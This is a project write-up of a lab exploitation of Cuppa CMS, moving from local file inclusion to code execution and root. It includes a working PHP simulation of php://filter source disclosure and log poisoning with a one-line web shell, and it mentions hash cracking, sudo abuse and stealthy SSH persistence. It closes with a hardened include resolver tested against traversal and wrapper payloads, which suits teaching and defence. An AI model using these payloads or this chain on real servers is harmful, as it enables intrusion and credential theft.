Overview
Alpha Attack is a technical research project focused on dissecting and exploiting legacy web application vulnerabilities within Cuppa CMS. The project demonstrates a “Kill Chain” methodology, moving systematically from initial reconnaissance to total system compromise.
The primary objective was to validate the impact of improper input sanitization in PHP applications and demonstrate how a seemingly minor file inclusion flaw can be leveraged to gain full administrative control over a server.
Problem
Web applications, particularly those running legacy codebases like older versions of Cuppa CMS, often fail to strictly validate user input. The target system exhibited a critical Local File Inclusion (LFI) vulnerability, allowing unauthenticated users to read arbitrary files that the web server process could access, including application configuration and credentials. The challenge was to demonstrate the severity of this flaw by escalating it beyond simple information disclosure.
Solution
The exploitation strategy followed a structured attack vector:
- Vulnerability Identification: Used automated scanning (OWASP ZAP) and manual verification to locate the LFI entry point in the CMS's configuration-handling scripts.
- Weaponization (LFI to RCE): Used PHP stream wrappers to read source files without executing them, then poisoned a web server log with a PHP web shell and included the log through the same flaw, converting the file inclusion vulnerability into Remote Code Execution (RCE).
- Privilege Escalation: Post-compromise enumeration revealed weak permissions. Used John the Ripper to crack the extracted password hashes and exploited misconfigured sudo rights to elevate privileges to root.
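The two mechanisms behind the LFI-to-RCE step, shown as an added example rather than the project's own code: a php://filter wrapper turns an unguarded include() into a source-disclosure primitive, and a PHP tag written into a web server log is executed the moment that log is included. The script runs entirely against temporary files, so no web server is required; the parameter name, file names, the access-log line and the config contents are constructed for the demo and do not reproduce the real target's paths.

```php
<?php
// Added example, not code from the Alpha Attack project: a local simulation of
// the LFI -> RCE chain. Everything runs against temporary files, so no web
// server is needed. The parameter name, file names and the log line are
// constructed for the demo; the real target paths are not reproduced here.
declare(strict_types=1);

// The vulnerable pattern: the request value reaches include() unchecked.
function vulnerable_include(string $page): void
{
    include $page;
}

$tmp        = sys_get_temp_dir();
$configFile = $tmp . '/alpha_attack_config.php';   // stand-in for a CMS config file
$accessLog  = $tmp . '/alpha_attack_access.log';   // stand-in for the web server log

// Constructed config file holding a secret that a plain include() would never print.
file_put_contents($configFile, "<?php\n\$db_user = 'cuppa';\n\$db_pass = 'constructed-secret';\n");

// Step 1, source disclosure. A php://filter wrapper makes include() emit the
// base64 of the file instead of executing it, so the credentials leak.
ob_start();
vulnerable_include('php://filter/convert.base64-encode/resource=' . $configFile);
$leakedSource = base64_decode(ob_get_clean(), true);
echo "--- leaked via php://filter ---\n", $leakedSource, "\n";

// Step 2, log poisoning. The web server writes the User-Agent header verbatim
// into its access log, so a PHP tag sent as the UA lands on disk.
$poisonedUserAgent = '<?php system($_GET["cmd"]); ?>';
$logLine = sprintf(
    "203.0.113.10 - - [%s] \"GET / HTTP/1.1\" 200 512 \"-\" \"%s\"\n",
    date('d/M/Y:H:i:s O'),
    $poisonedUserAgent
);
file_put_contents($accessLog, $logLine, FILE_APPEND);

// Step 3, execution. A second request points the LFI at the log and supplies
// the command in the query string; PHP parses the log and runs the tag.
$_GET['cmd'] = 'id';
echo "--- include of poisoned log with cmd=id ---\n";
vulnerable_include($accessLog);   // prints the log prefix, then the output of `id`

unlink($configFile);
unlink($accessLog);
```

Run it with `php demo.php`. Note that php://filter is a local wrapper, so it works inside include() even when allow_url_include is off; the defence against it is validating the parameter, not the remote-include setting. The same poisoning works against any file the attacker can write to and the web server can read (error logs, mail spools, session files), which is why the fix has to be applied at the include, not at one log.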
Technologies
- Reconnaissance: Nmap (Network mapping), OWASP ZAP (Vulnerability scanning).
- Exploitation: Bash (Payload automation), PHP (Web shell construction).
- Post-Exploitation: John the Ripper (Password Cracking), Linux System Internals (Privilege Escalation).
Key Features
- Reproducible Exploit Chain: Documented a step-by-step path from zero access to root.
- Custom Payloads: Developed sanitized PHP payloads designed to bypass basic filters.
- Persistence: Established stealthy SSH access for maintained control after the initial exploit.
- Reporting: Created a professional vulnerability assessment report detailing remediation steps (input validation on the included path, disabling dangerous PHP functions).
Results
- Critical Impact: Successfully demonstrated total system compromise starting from a single unauthenticated HTTP request parameter.
- Root Access: Achieved uid=0(root) privileges within the lab environment.
- Remediation: Provided actionable code patches to sanitize the $_REQUEST parameters in the vulnerable PHP script.
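What such a patch looks like in practice, as an added example and not the project's actual remediation diff: the unguarded include pattern beside a hardened resolver that allowlists the page name, refuses stream wrappers, and confirms the canonical path stays inside one directory. The directory layout, the parameter name "page", the allowlist and the test payloads are assumptions for the demo; it needs PHP 8 for str_contains and str_starts_with.

```php
<?php
// Added example, not the project's actual patch: the unguarded include beside a
// hardened resolver for the same request parameter. The directory layout, the
// parameter name "page" and the allowlist are assumptions; requires PHP 8.
declare(strict_types=1);

// Before: the request value is used as-is, so ../ traversal, php://filter
// wrappers and absolute paths to log files all reach include().
function vulnerable_resolve(string $page): string
{
    return $page;
}

// After: accept only a name from a fixed allowlist, resolve it under one
// directory, and verify the canonical path still lies inside that directory.
function safe_resolve(string $page, string $baseDir, array $allowed): ?string
{
    // Defence in depth: reject stream wrappers (php://, data://, phar://) and
    // NUL bytes before anything else looks at the value.
    if (str_contains($page, '://') || str_contains($page, "\0")) {
        return null;
    }
    // Exact match against the allowlist; no traversal sequence can survive this.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // Canonicalise and confirm containment, which also defeats symlink tricks
    // inside the pages directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page);
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// Demo: a throwaway pages directory with one legitimate page.
$pagesDir = sys_get_temp_dir() . '/alpha_attack_pages';
@mkdir($pagesDir);
file_put_contents($pagesDir . '/home.php', "<?php echo 'home';\n");
$allowed = ['home.php'];

// Constructed request values: one legitimate, the rest from the attack chain.
$payloads = [
    'home.php',
    '../../../../etc/passwd',
    'php://filter/convert.base64-encode/resource=home.php',
    '/var/log/apache2/access.log',
    "home.php\0.txt",
];

foreach ($payloads as $p) {
    $resolved = safe_resolve($p, $pagesDir, $allowed);
    printf("%-55s -> %s\n", addcslashes($p, "\0"), $resolved ?? 'REJECTED');
}

unlink($pagesDir . '/home.php');
rmdir($pagesDir);
```

Only the first payload resolves; the others are rejected before realpath() is ever called. The allowlist is the real control; the wrapper and NUL checks are there so that a later loosening of the allowlist (say, to a regex) does not silently reopen the php://filter route. The "disable dangerous PHP functions" item from the report maps to the php.ini disable_functions directive (system, exec, shell_exec, passthru, popen, proc_open), which would have stopped the poisoned log's system() call even with the include left unpatched, but it is a backstop, not a substitute for validating the parameter.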